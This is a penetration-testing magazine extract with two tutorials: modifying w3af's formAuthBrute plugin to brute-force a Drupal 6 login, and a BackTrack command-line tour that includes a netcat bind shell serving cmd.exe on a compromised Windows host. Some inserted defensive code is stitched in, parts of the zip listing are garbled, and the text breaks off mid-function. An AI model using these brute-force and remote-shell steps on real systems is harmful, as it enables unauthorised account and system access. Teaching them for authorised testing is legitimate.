You'll find both programs under Applications > BackTrack > Vulnerability Assessment > Web Application Assessment > Web Vulnerability Scanners. If you launch the GUI, you'll see a lot of things. The first page you see is the scan config. On the left you have the profiles. Next to it you can fill in a target URL and select all the plugins you want to use. On the right you have the “Start” (scanning) button and a button to perform advanced target operations, as well as the configuration parameters for the selected plugin. Above the different tabs you have some shortcut buttons (Figure 1). On the left, you can select some preconfigured profiles. The OWASP_TOP10 profile, for example, will select all plugins to perform an audit/attack against the top 10 vulnerabilities according to OWASP. We will create an empty profile by clicking on the second button above the tabs. Now fill in your target URL: http://localhost/drupal6/. If you click on the Advanced Target URL Configuration button you can additionally select an operating system (Unix/Windows) and a framework like, for example, PHP, Java, JSP, ASP, and more. For the demo, we'll leave this empty and just click the close button (Figure 2). Next, we'll select our plugins. Since we want to test a form against brute-forcing, we go to bruteforce, click on the plus sign, and select formAuthBrute. Then we go to the right and scroll all the way down. Here we configure our plugin. You can specify a username file, which is a text-based file with users. You can specify a password file as well. You may also just specify a combined file where you separate the username from the password with a separator. If you use this file, you must also specify the separator in comboSeparator. For the demo, we just use a username file and a password file. You can download a password file, or create your own. BackTrack also comes with 2 password list files. You can find them under file system > pentest > passwords > wordlists. The plugin can also use data which it found during the scan. For the demo, we deselect those options and only enable stopOnFirst, which configures the plugin so that it will stop after the first successful login. First, I will shortly explain the other options:

• useMailUsers: if other plugins found an email, this plugin will strip the email and will just use the first part as a user name
• useSvnUsers: the same as useMailUsers, but it will fetch the data from SVN headers
• passEqUser: as the name says, it will also use the user names as a password
• useLeetPasswd: this configuration option will alter the password into a Leet Speak password. An example: if the original password was “demo,” it will also try “d3m0.” Unfortunately it will not try “d3mo” or “[)3|\/|0.” It will only replace the characters with numbers in an all or nothing way
• useMails: this option is like useMailUsers, but instead of stripping the user from the email, it will use the entire email address as a user
• useProfiling: this option uses a list of passwords that was generated by the passwordProfiling plugin. The passwordProfiling plugin generates a list of possible passwords by reading the responses and counting the most common words. The password list is limited via the profilingNumber option

Figure 2. Advanced target settings in W3AF

Now you can start scanning the Drupal installation. For the demo, I used a short list of user names and passwords. If you run the scan, you'll see that W3AF won't find a possible password. But as I said before, the biggest problem with brute-forcing plugins is that they generate false positives and false negatives. So now that you know that this can't be true, let's do some digging. First check how the code works. Select the Scan Config tab, right-click on the formAuthBrute plugin and select Edit plugin. It's the Python code written by Andres Riancho in 2006. To save you all the trouble, just have a look at _matchesFailedLogin: he basically checks for a similarity. But apparently that doesn't work in our case. Secondly, have a look at _true_extra_fields. Andres sets all the other fields to 1 instead of their original value. He explains why as well, but I think this should be limited to check boxes only.

Figure 3. Tamper Data example of unsuccessful login

Figure 4. Tamper Data example of successful login

www.hakin9.org/en

Now let's see how Drupal behaves on a positive login and a negative login. Even though this can be done via a proxy, I usually just use Tamper Data for this. Install the Tamper Data plugin for Firefox. Go to your Drupal installation. Before you log in, start Tamper Data by clicking Tools > Tamper Data. Then click on Start Tamper. Now type in “a” as user name and “b” as password. A pop-up from Tamper Data will appear; select Submit. Now go to Tamper Data and click on Stop Tamper. Go all the way up to your POST message. See the return code of 200, which means OK (Figure 3). Now do the same but with a successful login. See that the status is 302, meaning Found? Nice. Think you can do the trick based on return codes? Wrong. I tried. W3AF will respond all the way with 200 HTTP response codes (Figure 4).
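The same 200-versus-302 difference the author observed in Tamper Data is what a defender can use on the server side to spot a brute-force run in the web server's access log: a burst of POSTs to the login form that all return 200 (the form re-rendered with an error) followed by one that returns 302. The detector below is an added example, not from the article or from w3af; the log lines are constructed Apache combined-format samples and the path /drupal6/user/login is assumed.

```python
# Added example: detect a login brute-force in web server access logs using
# the status-code behaviour observed on Drupal 6 (failed POST -> 200,
# successful POST -> 302). Sample log lines are constructed; LOGIN_PATH is
# an assumption for the demo install at http://localhost/drupal6/.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/drupal6/user/login"      # assumed login form path

# Constructed sample: one host guesses five times, then succeeds;
# another host mistypes once and then logs in normally.
SAMPLE_LOG = """\
192.168.1.50 - - [27/Jan/2013:10:12:01 -0500] "POST /drupal6/user/login HTTP/1.1" 200 5120
192.168.1.50 - - [27/Jan/2013:10:12:02 -0500] "POST /drupal6/user/login HTTP/1.1" 200 5120
192.168.1.50 - - [27/Jan/2013:10:12:03 -0500] "POST /drupal6/user/login HTTP/1.1" 200 5120
192.168.1.50 - - [27/Jan/2013:10:12:04 -0500] "POST /drupal6/user/login HTTP/1.1" 200 5120
192.168.1.50 - - [27/Jan/2013:10:12:05 -0500] "POST /drupal6/user/login HTTP/1.1" 200 5120
192.168.1.50 - - [27/Jan/2013:10:12:06 -0500] "POST /drupal6/user/login HTTP/1.1" 302 0
192.168.1.50 - - [27/Jan/2013:10:12:07 -0500] "GET /drupal6/user/1 HTTP/1.1" 200 7300
192.168.1.199 - - [27/Jan/2013:10:15:00 -0500] "POST /drupal6/user/login HTTP/1.1" 200 5120
192.168.1.199 - - [27/Jan/2013:10:16:30 -0500] "POST /drupal6/user/login HTTP/1.1" 302 0
"""


def parse(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect(log_text: str, threshold: int = 5, window: timedelta = timedelta(minutes=5)):
    """One alert per source IP whose failed login POSTs within `window` reach
    `threshold`; `success_after` records whether a 302 followed the burst,
    i.e. the guessing very likely worked."""
    failures = defaultdict(list)   # ip -> timestamps of failed (200) login POSTs
    alerts = {}
    for line in log_text.splitlines():
        ev = parse(line)
        if not ev or ev["method"] != "POST" or ev["path"] != LOGIN_PATH:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["status"] == 200:
            # keep only failures inside the sliding window, then count
            failures[ip] = [t for t in failures[ip] if ts - t <= window] + [ts]
            if len(failures[ip]) >= threshold and ip not in alerts:
                alerts[ip] = {"failures": len(failures[ip]),
                              "since": failures[ip][0],
                              "success_after": False}
        elif ev["status"] == 302 and ip in alerts:
            alerts[ip]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(ip, info)
```

The check keys on the login path and the status code only, so it needs no application log; the trade-off is that any change to how the form answers a bad password (a 403, a JSON body) breaks the heuristic, which is exactly the kind of assumption the article's plugin tripped over from the other side.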

Listing 1. _matchesFailedLogin method rewritten to work with Drupal

    def _matchesFailedLogin(self, resp_body):
        '''
        @return: True if the resp_body matches the previously created responses
        that are stored in self._login_failed_result_list.

        lfrl = self._login_failed_result_list
        # 0.65 gives a good measure of similarity
        if relative_distance_ge(resp_body, lfrl[0], 0.65) or \
           relative_distance_ge(resp_body, lfrl[1], 0.65):
            return True
        else:
            # I'm happy! The response_body *IS NOT* a failed login page.
            return False
        '''
        # Replaced above code by Kevin Simons for Hakin9 Drupal Demo,
        # expected result is an error message with the text below
        if '<div class="messages error">' in resp_body:
            return True
        else:
            return False

Listing 2. _matchesFailedLogin method user/password information

    def _do_req_without_cookies(fuzz_req):
        url = fuzz_req.getURI()
        data = fuzz_req.getData()
        headers = fuzz_req.getHeaders()
        # Typically GET and POST
        meth = getattr(xUrllib(), fuzz_req.getMethod().upper())
        # Added for the Hakin9 Drupal demo: log the user/password data being sent
        om.out.information(data)
        resp = meth(url, data, headers, grep=False, cache=False)
        return resp


So what I did was start looking inside the body for something specific. And there it was: <div class="messages error">. This wasn't in the body on a successful login. Now it's time to adapt the code.

Remember that we don't have check boxes and we don't want our other fields to be changed (otherwise it won't work). A bit further down, comment out certain lines. This is the final result of that piece of code (Listing 3).

Adapt the code for a successful brute-force

In the method audit, comment out this line, since we don't need it: self._idFailedLoginPage(freq). Then go to the method _matchesFailedLogin and comment out everything. We are going to rewrite this method so that it works with our Drupal installation. This is now our method: Listing 1. In the method _bruteWorker also comment out this line: data_container = self._true_extra_fields(data_container)

In that same method you can add information to check what user/password it is sending. Here is the final result of that part: Listing 2.

Figure 5. Example of a successful attack

Listing 3. Final result of the _matchesFailedLogin method

        # TODO: This is a *hack*. This logic shouldn't be implemented
        # in the plugin but in xUrllib
        try:
            resp = _do_req_without_cookies(freq)
        except w3afMustStopOnUrlError:
            return
        body = resp.getBody()
        # Edited by Kevin Simons for Hakin9 Drupal Demo. We don't want the body to be replaced
        # body = body.replace(username, '').replace(userpwd, '')

        with self._plugin_lock:
            if not self._matchesFailedLogin(body):
                # Ok, this might be a valid combination.
                # Now test with a new invalid password to ensure our
                # previous possible found credentials are valid
                # Edited by Kevin Simons for Hakin9 Drupal Demo. Useless rubbish in our case
                # data_container[self._passwd_field_name][0] = \
                #     createRandAlNum(8)
                # freq.setDc(data_container)
                # verif_resp = _do_req_without_cookies(freq)
                # body = verif_resp.getBody()
                # body = body.replace(username, '').replace(userpwd, '')

                # if self._matchesFailedLogin(body):
                self._found = True
                freq_url = freq.getURL()


Re-launch the brute-force login scan and analyze the results

After you have restarted W3AF (or reloaded the plugin), you will see the magic work. In the log file the result is marked in red, but you can also go to the Results tab (Figure 5). As expected, the name and password were found. Luckily, brute-forcing Drupal 7 logins won't be that easy, because the default lock-out mechanism locks the user out for 6 hours after five unsuccessful tries. It will also send an email to the user to change the password.

W3AF Form brute-forcing via W3AF console

If you don't want to use the GUI, you can use the console. Go to Applications > BackTrack > Vulnerability Assessment > Web Application Assessment > Web Vulnerability Scanners and start w3af console. This will open a terminal. Type “plugins” to go to the plugins. Now type “bruteforce formAuthBrute.” This command enables the form brute-forcing plugin. If you forgot the name, you can use the Tab key to list the different plugins (as I did). Verify that the plugin is enabled by retyping the command “bruteforce” (Figure 6). Now let's configure the plugin. Type “bruteforce config formAuthBrute” and, to view the default settings, type “view” (Figure 7). Remember that we didn't want to use any of the options except stopOnFirst. To change a value, type set <option> false, where you replace <option> with the option name. If you want to change the path of a file, just type set <option> <path> (Figure 8). Now that you have configured the plugins, it's time to prepare the output. Type “back” to leave the plugin configuration and then type “output console, textFile” to generate output to both the console and a text file. Then type “output configuration textFile” to configure the settings for the textFile. First, set a path where the file should be created. In my case, it is set to the root directory by typing set fileName /root/result.txt. Then set its verbose mode by typing “set verbose True.” Then configure the console. Type “back” followed by “output configuration console.” Then type “set verbose True” (Figure 9).

Figure 6. Enabling the formAuthBrute plugin via console

Figure 7. Viewing the options for the formAuthBrute plugin

Figure 8. Setting the options for the plugin

Figure 9. Setting output options

Now that you are finished configuring the plugins, type “back” twice, set the target URL and start the scan (Figure 10). Now open the file and search for 'vulnerability' and you'll find this line: [Sun 27 Jan 2013 10:12:25 AM EST – vulnerability] Found authentication credentials to: http://localhost/drupal6/. A correct user and password combination is: kevin/useless.

Harden your Drupal installation

You can install the Drupal Login Security module to prevent brute-forcing. You can additionally install the Captcha module to make a distinction between a PC and a human. Be aware that these modules might contain bugs themselves. This was the case, for example, for the Captcha module, which could be bypassed easily. The bug was detected on 30th August 2012 but is fixed now. You can also upgrade to Drupal version 7 (or 8, which is currently still in development). Server SSO: you can move the brute-forcing problem to another server, which manages authentication, like for example an ISA (Internet Security and Acceleration) server. On that server you have the option to lock out a user after x retries. If you lock yourself out, you can still reach the normal Drupal login page, but only after you have authenticated yourself using the Server SSO.

Authentication protocols I consider unsafe

NTLMv1 SSO: NTLMv1 is still widely supported, but it is just not secure (e.g. rainbow table cracking). NTLMv2 SSO: it looks secure, but it isn't either. There are ways to get the necessary data to start the brute force. At Black Hat they did the test, back in 2002, with 16 CPUs (4 million tries/sec): they could break a 7 places password within 10 days. Just for the record: 25 GPUs nowadays produce over 348 billion hashes per second offline. For more information visit http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours. So an 8 places password gets brute-forced in less than 6 hours. Microsoft advises to use Kerberos5. Kerberos5: even though Kerberos provides strong encryption over the network, it can't prevent brute-force attacks against its centralized KDC. On top of that, an attacker can downgrade and thus prevent the system from using the more advanced encryption algorithms. This vulnerability was patched, but there are still unpatched systems. If you have the patched Kerberos version and a patched server, you might consider it safe. But never forget to harden the network too.
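The lock-out behaviour the hardening section relies on (Drupal 7's default of five failures followed by a six-hour lock, and the “lock out after x retries” option on an SSO server) is small enough to show in full. The following is an added example written for this article, not Drupal's or the Login Security module's code. It counts failures per account and per source address, so one address cannot spray many accounts freely, and takes the clock as a parameter so the lock expiry can be exercised without waiting. The user table, timestamps and addresses are constructed; a real deployment compares a password hash, not the plaintext string used here.

```python
# Added example: a minimal server-side login lockout of the kind the article
# recommends. Defaults follow the Drupal 7 policy quoted in the article
# (5 failures -> 6 hour lock). Everything else (window, users, IPs) is assumed.
from collections import defaultdict
from dataclasses import dataclass, field
import hmac


@dataclass
class LoginGuard:
    max_failures: int = 5
    lock_seconds: int = 6 * 3600
    window_seconds: int = 3600        # failures older than this are forgotten
    _failures: dict = field(default_factory=lambda: defaultdict(list), init=False, repr=False)
    _locked_until: dict = field(default_factory=dict, init=False, repr=False)

    def is_locked(self, key: str, now: float) -> bool:
        until = self._locked_until.get(key)
        return until is not None and now < until

    def record_failure(self, key: str, now: float) -> bool:
        """Count a failure; return True when this one triggers a lock
        (the caller would notify the account owner, as Drupal 7 does)."""
        recent = [t for t in self._failures[key] if now - t <= self.window_seconds]
        recent.append(now)
        self._failures[key] = recent
        if len(recent) >= self.max_failures:
            self._locked_until[key] = now + self.lock_seconds
            self._failures[key] = []
            return True
        return False

    def record_success(self, key: str) -> None:
        self._failures.pop(key, None)


def attempt_login(guard: LoginGuard, users: dict, username: str, password: str,
                  now: float, ip: str) -> str:
    """Return 'locked', 'ok' or 'bad'. Both the account and the source IP are
    keyed, so a locked IP is refused for every account and vice versa."""
    acct_key, ip_key = f"user:{username}", f"ip:{ip}"
    if guard.is_locked(acct_key, now) or guard.is_locked(ip_key, now):
        return "locked"                  # refused before the password is even checked
    stored = users.get(username, "")     # demo only: a real system stores a hash
    if stored and hmac.compare_digest(stored.encode(), password.encode()):
        guard.record_success(acct_key)
        return "ok"
    guard.record_failure(acct_key, now)
    guard.record_failure(ip_key, now)
    return "bad"


def simulate():
    """Constructed run: five wrong guesses at t=0..4, the right password at
    t=6 (still locked), the right password again once the lock has expired."""
    guard = LoginGuard()
    users = {"kevin": "correct horse battery staple"}   # placeholder account
    results = [attempt_login(guard, users, "kevin", f"guess{i}", now=i, ip="192.168.1.50")
               for i in range(5)]
    results.append(attempt_login(guard, users, "kevin", users["kevin"], now=6, ip="192.168.1.50"))
    results.append(attempt_login(guard, users, "kevin", users["kevin"],
                                 now=6 + 6 * 3600, ip="192.168.1.50"))
    return results


if __name__ == "__main__":
    print(simulate())
```

Note that the guard refuses the correct password while the lock is active: that is the point of the mechanism, and also why the article's console run against Drupal 6 (which has no such guard) succeeds with a wordlist of a few entries.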

KEVIN SIMONS

A consultant working for BTR Services at Boom (BE), usually doing large development projects for other companies spread over several years. Active in the application development section, promoting secure coding and doing audits based on the OWASP Top 10. Also coaches people, shares his knowledge with others, and gives presentations on various topics. Besides computer science, also follows science in general (particle physics in particular). During the weekends he spends time with his four-year-old daughter, teaching her funny creative things; he even explained to her how to spoof face recognition by just using a picture.

Figure 10. Setting the target URL and start the scan


Backtrack Linux: How to Ditch the Menu and Ball from the Command Line?

Backtrack Linux has become more popular over the years as businesses have been losing money because of data breaches through malware infections or targeted attacks. The media has caught on and realized that these breaches are not only fascinating to the businesses themselves or the so-called nerds or geeks that resolve their issues; the general public is interested in these data breaches too, which makes Information Security huge news in 2013.

The end result is a snowball effect that appears to only be picking up steam. One outcome of the snowball effect is the fact that more people are hired into Information Security with less experience. It is not uncommon in today's market to see people working in the Information Security industry who don't know their way around Linux from the command line or, as we sometimes call them, GUI (Graphical User Interface) robots. The same effect was seen with ISPs in the late 90s, when people were hired with little to no experience regarding basic TCP/IP networking skills. We all started out knowing little to nothing about security or about Linux, so those that spend time poking around the Linux CLI (Command Line Interface) will surely be on their way to becoming Security Ninjas. I always tell friends that I grew up with that if I can learn this material you surely can as well. It comes down to effort and what life sacrifices you are willing to make to elevate your game to the next level. This article is a crash course in Backtrack Linux command line tools that will familiarize you with various locations where tools you have never heard of exist.

Introduction

In the text to follow I provide quick examples of various tools available from the command line in Backtrack Linux. The Backtrack menus already provide an overwhelming amount of tools that will allow you to accomplish almost anything you need in a penetration test or security audit. However, if you never get past the Backtrack menu system, you will be doing yourself a huge disservice. If you want to advance to the next level in your career, break away from the norm and explore. Many of us who have been doing this for a long time can remember when we had to compile every single tool we used, and it may have taken an entire day just to work through issue after issue that used to materialize with new applications or new ideas. It is amazing how far Linux has come in the past five years and I am looking forward to where it is going to be in five more. The goal of this article is to familiarize you with numerous directories located within the Backtrack Linux directory structure, where tools that didn't make it into the Backtrack menu system or the Backtrack /pentest directory are located. I encourage you to use these examples as an opportunity to explore each directory further and see what gems await. Don't limit yourself to the minimal amount of information in this article, but use it as a blueprint to investigate Backtrack inside and out. While you test the below examples, take extra time and perform an ls in each directory where the tools in the examples are located. Then take it a step further and run man "application-name", "application-name" -h, or "application-name" --help against each application or script listed by the ls command. I have split the below sections by the directory where the example tools are located and attempted to provide lesser-known examples to show that there are so many hidden gems in Backtrack you could spend weeks or months simply exploring them without ever mastering a single item. So buckle up, drop into a shell, and ball from the Backtrack Linux command line.

:/bin – User Binaries
:Examples – ls, ip, ps, rm, umount

If you are familiar with Linux at all, then you have likely run commands that exist in this directory. There are not a ton of security related tools in the /bin directory, but there is one application that is on every list of the most well-known security tools. That command is Netcat, which is fairly basic, yet powerful in the sense that it can create backdoors or shovel data between servers with ease. It should be noted that netcat run from the command line is the same as nc run from the command line, and many people use nc exclusively because it's easier to type two letters instead of six. While working on the command line in Linux you can use the "which" command to see the full path to the application you are running, as shown in the example below. In this example we show that just because you are issuing a command from a specific directory it doesn't mean that is what is actually running. If this happens to be a Linux server that you do not control, or one that potentially had a breach of some sort, it's important to know what is happening when you run a specific command. You do not want to be the guy on the security team who triggers extra damage without even knowing it was triggered. In this example we show that, while running nc is not malicious, it is not simply running nc from the bin directory; it is in fact linked to a file in another directory, which in turn is linked to nc.traditional back in the /bin directory. Familiarize yourself with egrep, grep, ls, and which as part of the path to balling on the Backtrack Linux command line (Listing 1).

Listing 1. Use which, ls, grep, and egrep to investigate netcat and nc

    root@bt:~# which nc
    /bin/nc
    root@bt:~# which netcat
    /bin/netcat
    root@bt:~# ls -alh /bin | egrep 'nc |netcat '
    lrwxrwxrwx 1 root root 20 2013-01-08 06:41 nc -> /etc/alternatives/nc
    lrwxrwxrwx 1 root root 24 2013-01-08 06:41 netcat -> /etc/alternatives/netcat
    root@bt:~# ls -alh /etc/alternatives | egrep 'nc |netcat '
    lrwxrwxrwx 1 root root 19 2013-01-08 06:41 nc -> /bin/nc.traditional
    lrwxrwxrwx 1 root root 19 2013-01-08 06:41 netcat -> /bin/nc.traditional
    root@bt:~# ls -alh /bin/ | grep nc.traditional
    -rwxr-xr-x 1 root root 27K 2008-06-21 18:51 nc.traditional
    root@bt:~#

The point of the above output is to become familiar with the Linux command line and to provide an example of things not always being what they seem. It is important to understand your environment and the commands you are running. Now let's see some of what Netcat can actually accomplish by creating a Netcat listener on a Windows server, making a connection to the listener from Backtrack, and running a command on the remote Windows server to prove the connection. The example in Listing 2 assumes you have already gained access to a Windows server and placed nc.exe, or Netcat for Windows, on the server. In this example the Windows server is located at 192.168.1.75 and the Backtrack server is located at 192.168.1.78 (Listing 2). In that output a Netcat listener offering the Windows Command Prompt, cmd.exe, was created on port 80 of the Windows server. Then we connect to the listener using Netcat from the Backtrack Linux server and immediately we are dropped into the Command Prompt on the remote server, which is confirmed by running the netsh command on Windows to display the IP of the Windows server itself. Backtrack actually provides Windows binaries such as nc.exe in the /pentest/windows-binaries directory, so be sure to explore the windows-binaries sub directories to spark ideas of tasks you can accomplish on compromised Windows systems. Netcat can accomplish much more than the above example, so be sure to read the man page to understand more of its capabilities. If you like what you see regarding Netcat but would prefer encrypted connections between servers, look into the sbd command. At this point you get the idea that there are things to explore in the /bin directory, so let's move on to the next one we are going to touch on in this article, which is /sbin.

Listing 2. Open Netcat listener on Windows server and connect from Backtrack

Netcat run from Windows server – 192.168.1.75

    C:\Users\alex\Desktop>nc -L -p 80 -e cmd.exe

Netcat run from Backtrack server – 192.168.1.78

    root@bt:~# nc 192.168.1.75 80
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.

    C:\Users\alex\Desktop>netsh interface ip show addresses "Local Area Connection"
    netsh interface ip show addresses "Local Area Connection"

    Configuration for interface "Local Area Connection"
        DHCP enabled:                         No
        IP Address:                           192.168.1.75
        Subnet Prefix:                        192.168.1.0/24 (mask 255.255.255.0)
        Default Gateway:                      192.168.1.1
        Gateway Metric:                       256
        InterfaceMetric:                      10

    C:\Users\alex\Desktop>exit
    root@bt:~#

:/sbin – System Binaries
:Examples – fsck, iptables, reboot, route

The /sbin directory, as noted above, should contain system-level binaries such as the examples listed in the title. Understanding sockets and how they work is critical to being in the Information Security industry, so if you are not familiar with the tools mentioned in the following paragraph, please take the time to read man pages, search on the Internet, read a book, or do whatever it takes to provide yourself with a solid foundation regarding sockets. The tool we are going to dig into in /sbin is called ss, which is a utility used to investigate sockets. You might be familiar with netstat, which is an amazing command line utility that can quickly provide you details of socket connections, from fully established to somewhere else in the process of being established, including timed out. If you are not familiar with netstat, check out its capabilities by typing “man netstat” from a terminal window in Backtrack, or dive right in by typing netstat -rn to display the route table in Linux, and netstat -antpu to display all TCP/UDP connections in numeric form. The ss command expands on netstat by providing even more details, such as information about each socket connection's memory usage when using the -m switch. The example we provide below gives simple output of active TCP sockets and their memory usage (Listing 3).

Listing 3. Listing only TCP sockets using ss on Backtrack Linux

    root@bt:~# ss -t -m
    State      Recv-Q Send-Q      Local Address:Port        Peer Address:Port
    ESTAB      0      0            192.168.1.78:ssh          192.168.1.75:55560
             mem:(r0,w0,f0,t0)
    ESTAB      0      0            192.168.1.78:ssh          192.168.1.199:54389
             mem:(r0,w0,f0,t0)
    ESTAB      0      0            192.168.1.78:www          192.168.1.75:55571
             mem:(r0,w0,f0,t0)
    ESTAB      0      0            192.168.1.78:ssh          192.168.1.199:53998
             mem:(r0,w0,f4096,t0)
    root@bt:~#

In the above output we can see that there appear to be four established connections, which include three SSH sessions and a single HTTP session. The connections are made from two different hosts to the Backtrack Linux server where the ss command was run, which is located at 192.168.1.78. While there isn't much memory information because the connections are sitting idle, the point is that the socket memory information is available and comes in handy when troubleshooting connections between servers, or when attempting to fingerprint services on a specific server. The ss command is an extremely powerful socket investigation utility and, like each of the other tools being mentioned in this article, could fill the entire length of this text. Take the time to investigate each of the commands available in the /sbin directory on Backtrack Linux and you will surely find some hidden gems! Are you starting to see a pattern here? There are amazing applications, commands, scripts, binaries, etc. hidden all over Backtrack, and all it takes is digging in to raise your game to the next level. Next, we are moving on to the /usr/bin directory, where I wanted to touch on some zip file utilities that never get mentioned, as well as a couple of other random tools.

:/usr/bin – Non-essential command binaries
:Examples – curl, gcc, scp

The /usr/bin directory is the location of thousands of different commands within Backtrack and there will not be a shortage of commands you have never seen before. Ever heard of mechdump? Me neither until I started writing this article. This is one of the reasons that I love Backtrack as it’s the gift that keeps on giving and not in the way we are used to when that phrase is used as this gift doesn’t itch. The mech-dump com-

Listing 4. Query zip file contents for details, encrypt files inside of a zip file, and query the encrypted files root@bt:~# zipinfo three-text-files.zip found file ‘README.TXT’, size 1556 (811) 95 54 4d 8f d3 48 10 bd 47 ca 7f 28 : 71 81 91 12 93 99 65 found file ‘Readme31.txt’, size 1306 (681) 95 54 4d 6f db 30 0c bd 07 c8 7f e0 : 2d 2d 90 b8 49 b7 61 found file ‘Release Notes.txt’, size 872 (455) 8d 52 cb 6e db 40 0c bc 0b d0 3f f0 : d8 16 b1 62 39 45 81 root@bt:~/cloak# root@bt:~/cloak# zipcloak three-text-files.zip Enter password: Verify password: encrypting: README.TXT encrypting: Readme31.txt encrypting: Release Notes.txt root@bt:~/cloak# root@bt:~/cloak# zipinfo three-text-files.zip found file ‘README.TXT’, size 1556 (823), encrypted c0 0c 8c 45 ca c6 f6 73 17 d9 e0 73 : d6 4e 0f a5 d5 88 5b found file ‘Readme31.txt’, size 1306 (693), encrypted c2 ac 51 63 a7 7d df 9d 0c 28 b4 31 : 5b 63 b4 da 78 c4 7a found file ‘Release Notes.txt’, size 872 (467), encrypted 15 b4 7c 27 56 16 87 2d a8 c7 02 b3 : 5a 4f c0 7d c0 5d f3 root@bt:~/cloak#

www.hakin9.org/en

b5 28 da 45 ac 45 b0 61 1f 5d e6 66 b8 49 6a

96 b6 9a a5 1b 9e 42 5d 35 3e 0c 76 42 cb e2

23


Hakin9 Extra

mand provides a quick way to analyze a website by dumping four sections of data: the headers, a list of forms, a list of links, and a list of images on the page. The headers, as you know, can provide a ton of great information about target web servers. The example commands we are going to take a quick look at in the /usr/bin directory are zipinfo and zipcloak. As you have probably guessed already, both deal with zip files: zipinfo provides information about a specific zip file on a server, and zipcloak provides a simple method to encrypt each file within a zip file. Let's take a look at zipinfo and zipcloak in action by first querying a zip file using zipinfo, then encrypting the text files in the zip file using zipcloak, and then querying the file again with zipinfo to see what the difference is. The zip file we are using in this example is named three-text-files.zip and, again, you guessed correctly: it contains three text files (Listing 4). So you might ask, what's the big deal in knowing whether a zip file is encrypted or which files exist within a zip archive? Ever get a zip file from a shady coworker who may want to send your world crashing down, or from that neighbor down the street who asked you why the sound wasn't working on their computer, only for you to spend Sunday afternoon helping them troubleshoot with an end result of you clicking the unmute button? Well, zipinfo provides you a method to never miss one of those fancy chain letters again (I hear you have a relative in Zimbabwe who wants to send you USD $4.5 million once you send them $5,000) by first verifying it's not bundled with the latest malware. Now zipcloak is slick regardless, because you can encrypt the files on Backtrack and send them to other Linux users to decrypt, as well as to Windows users, who can decrypt using pretty much anything as well. I tested decrypting zip files on Windows that were encrypted with zipcloak on Backtrack using Windows Explorer, WinRAR, and 7-Zip without any issues at all.

Listing 5. Determine if you are on a desktop or a laptop using laptop-detect, located in /usr/sbin on Backtrack Linux

root@bt:~# laptop-detect -v
We're not on a laptop (no relevant hint found)
root@bt:~#
root@bt:~# laptop-detect -v
We're a laptop (dmidecode returned Portable)
root@bt:~#
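As an added example (not from the article and not the zipinfo or zipcloak tools themselves), the following Python script reads a ZIP archive's central directory the way zipinfo does, reports each entry's name, compression method, sizes and whether it is encrypted (the flag zipcloak sets), and then runs the checks a cautious recipient of a "shady" zip wants before extracting: names that escape the extraction directory, encrypted payloads that cannot be inspected, and absurd compression ratios. The sample archive and all function names are constructed here; the encrypted entry is simulated by setting the encryption flag bit, since zipcloak is not run.

```python
import io
import struct
import zipfile

# ZIP signatures and flag bits (PKWARE APPNOTE). zipcloak sets general purpose
# bit 0 on the entries it enciphers; that bit is what zipinfo reports as encrypted.
EOCD_SIG = b"PK\x05\x06"
CDIR_SIG = b"PK\x01\x02"
FLAG_ENCRYPTED = 0x0001
FLAG_UTF8 = 0x0800
METHODS = {0: "stored", 8: "deflated", 12: "bzip2", 14: "lzma"}


def _locate_central_directory(data):
    """Return (offset, entry_count) read from the end-of-central-directory record."""
    idx = data.rfind(EOCD_SIG)
    if idx < 0:
        raise ValueError("not a ZIP archive: EOCD record missing")
    # disk no, cd disk, entries on this disk, total entries, cd size, cd offset, comment len
    _, _, _, total, _, cd_offset, _ = struct.unpack_from("<HHHHIIH", data, idx + 4)
    return cd_offset, total


def inspect_zip(data):
    """Walk the central directory and return one dict per entry, zipinfo-style."""
    offset, count = _locate_central_directory(data)
    entries = []
    for _ in range(count):
        if data[offset:offset + 4] != CDIR_SIG:
            raise ValueError("corrupt central directory at offset %d" % offset)
        # skip version made by / version needed, read flags and method, skip mod
        # time and date, then CRC, both sizes and the three trailing length fields
        (flags, method, crc, csize, usize,
         name_len, extra_len, comment_len) = struct.unpack_from(
            "<xxxxHHxxxxIIIHHH", data, offset + 4)
        raw_name = data[offset + 46:offset + 46 + name_len]
        entries.append({
            "name": raw_name.decode("utf-8" if flags & FLAG_UTF8 else "cp437"),
            "method": METHODS.get(method, "method-%d" % method),
            "compressed": csize,
            "uncompressed": usize,
            "crc32": crc,
            "encrypted": bool(flags & FLAG_ENCRYPTED),
        })
        offset += 46 + name_len + extra_len + comment_len
    return entries


def risky_entries(entries, max_ratio=1000):
    """Pre-extraction checks: path escapes, unscannable encrypted payloads,
    and compression ratios high enough to suggest a zip bomb."""
    findings = []
    for e in entries:
        name = e["name"]
        parts = name.replace("\\", "/").split("/")
        if name.startswith(("/", "\\")) or ".." in parts:
            findings.append((name, "path escapes the extraction directory"))
        if e["encrypted"]:
            findings.append((name, "encrypted: contents cannot be inspected before extraction"))
        if e["compressed"] and e["uncompressed"] / e["compressed"] > max_ratio:
            findings.append((name, "compression ratio above %d (possible zip bomb)" % max_ratio))
    return findings


def mark_encrypted(data, name):
    """Stand-in for zipcloak: set the encryption bit on one central-directory
    record so the archive reports that entry as encrypted. (The real tool also
    enciphers the payload; this simulation only flips the flag.)"""
    offset, count = _locate_central_directory(data)
    patched = bytearray(data)
    for _ in range(count):
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", patched, offset + 28)
        if bytes(patched[offset + 46:offset + 46 + name_len]) == name.encode():
            flags, = struct.unpack_from("<H", patched, offset + 8)
            struct.pack_into("<H", patched, offset + 8, flags | FLAG_ENCRYPTED)
        offset += 46 + name_len + extra_len + comment_len
    return bytes(patched)


def build_sample_archive():
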